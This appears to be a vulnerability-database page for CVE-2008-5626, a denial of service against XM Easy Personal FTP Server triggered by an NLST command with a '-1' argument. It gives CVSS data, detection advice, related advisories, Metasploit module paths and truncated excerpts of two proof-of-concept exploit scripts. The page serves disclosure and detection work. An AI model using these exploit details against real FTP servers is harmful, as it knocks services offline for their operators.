CVE-2008-5626
published 2008-12-17CVE-2008-5626: XM Easy Personal FTP Server 5.6.0 allows remote authenticated users to cause a denial of service via a crafted argument to the NLST command, as demonstrated by…
PriorityP425medium4CVSS 2.0
AVNACLAuSCNINAP
EXPLOIT
EPSS
35.86%
98.3th percentile
XM Easy Personal FTP Server 5.6.0 allows remote authenticated users to cause a denial of service via a crafted argument to the NLST command, as demonstrated by a -1 argument.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dxmsoft | xm_easy_personal_ftp_server | — | — |
| dxmsoft | xm_easy_personal_ftp_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect DoS attempt by monitoring for an authenticated FTP NLST command sent with a '-1' argument against XM Easy Personal FTP Server on port 21. ↗
- →Even anonymous FTP accounts can trigger the vulnerability if they have permission to call NLST; alert on NLST commands from anonymous sessions as well as authenticated ones. ↗
- →Monitor for FTP sessions that issue USER/PASS followed immediately by a bare or argument-bearing NLST command with no directory path, particularly with negative numeric arguments such as -1. ↗
- →The Metasploit auxiliary modules targeting this CVE are located at modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb and xmeasy570_nlst.rb; use these paths to identify exploitation attempts via Metasploit. ↗
- ·Exploitation requires an authenticated FTP session; however, anonymous login is sufficient if the anonymous account has NLST permission enabled — review and restrict anonymous FTP permissions on XM Easy Personal FTP Server. ↗
- ·Both versions 5.6.0 and 5.7.0 of XM Easy Personal FTP Server are confirmed vulnerable; detections and mitigations should cover both version branches. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-q855-r9x6-prhq: XM Easy Personal FTP Server 5
ghsa_unreviewed·2022-05-17
CVE-2008-5626 [MEDIUM] GHSA-q855-r9x6-prhq: XM Easy Personal FTP Server 5
XM Easy Personal FTP Server 5.6.0 allows remote authenticated users to cause a denial of service via a crafted argument to the NLST command, as demonstrated by a -1 argument.
GHSA
GHSA-3vxp-49m8-73gc: Dxmsoft XM Easy Personal FTP Server 5
ghsa_unreviewed·2022-05-02·CVSS 4.0
CVE-2009-3643 [MEDIUM] GHSA-3vxp-49m8-73gc: Dxmsoft XM Easy Personal FTP Server 5
Dxmsoft XM Easy Personal FTP Server 5.8.0 allows remote attackers to cause a denial of service via a long argument to the (1) LIST and (2) NLST commands, a differnt issue than CVE-2008-5626 and CVE-2006-5728.
No detection rules found.
Exploit-DB
XM Easy Personal FTP Server 5.7.0 - 'NLST' Denial of Service
exploitdb·2009-03-27
CVE-2008-5626 XM Easy Personal FTP Server 5.7.0 - 'NLST' Denial of Service
XM Easy Personal FTP Server 5.7.0 - 'NLST' Denial of Service
---
/*
XM Easy Personnal FTP Server Syntax : \n",file);
fprintf(stdout,"=>Exemple : %s 127.0.0.1 21 login1 password1\n",file);
exit(0);
}
int main(int argc, char **argv)
{
if (argc < 4)
syntax(argv[0]);
int port = atoi(argv[2]);
int mysocket;
int mysocket2;
int srv_connect;
int sockaddr_long;
struct sockaddr_in sockaddr_mysocket;
sockaddr_long = sizeof(sockaddr_mysocket);
sockaddr_mysocket.sin_family = AF_INET;
sockaddr_mysocket.sin_addr.s_addr = inet_addr(argv[1]);
sockaddr_mysocket.sin_port = htons(port);
char request[50];
char answer[200];
fprintf(stdout,"[+]Connect to Server %s\n",argv[1]);
mysocket2 = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket2 == -1){
fprintf(stderr,"[-]FAILED SOCKET\n");
return 1;}
srv_connect
Exploit-DB
XM Easy Personal FTP Server 5.6.0 - Remote Denial of Service
exploitdb·2008-10-13
CVE-2008-5626 XM Easy Personal FTP Server 5.6.0 - Remote Denial of Service
XM Easy Personal FTP Server 5.6.0 - Remote Denial of Service
---
print "--------------------------------------------------------------"
print "# XM Easy Personal FTP Server 5.6.0 Remote Denial of Service"
print "# url: http://www.dxm2008.com/"
print "# author: shinnai"
print "# mail: shinnai[at]autistici[dot]org"
print "# site: http://www.shinnai.net"
print "--------------------------------------------------------------"
import socket
import time
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
conn = s.connect(("127.0.0.1",21))
d = s.recv(1024)
print "Server USER: test"
d = s.recv(1024)
print "Server PASS: test"
d = s.recv(1024)
print "Server NSLT: -1"
d = s.recv(1024)
print "Server <- " + d
time.sleep(2)
except:
print "- Unable to connect. exiting."
# milw0rm.com [2008-10
Metasploit
XM Easy Personal FTP Server 5.7.0 NLST DoS
metasploit
XM Easy Personal FTP Server 5.7.0 NLST DoS
XM Easy Personal FTP Server 5.7.0 NLST DoS
You need a valid login to DoS this FTP server, but even anonymous can do it as long as it has permission to call NLST.
Metasploit
XM Easy Personal FTP Server 5.6.0 NLST DoS
metasploit
XM Easy Personal FTP Server 5.6.0 NLST DoS
XM Easy Personal FTP Server 5.6.0 NLST DoS
This module is a port of shinnai's script. You need a valid login, but even anonymous can do it as long as it has permission to call NLST.
No writeups or analysis indexed.
http://securityreason.com/securityalert/4766http://www.securityfocus.com/bid/31739http://www.vupen.com/english/advisories/2008/2803https://www.exploit-db.com/exploits/6741http://securityreason.com/securityalert/4766http://www.securityfocus.com/bid/31739http://www.vupen.com/english/advisories/2008/2803https://www.exploit-db.com/exploits/6741
2008-12-17
Published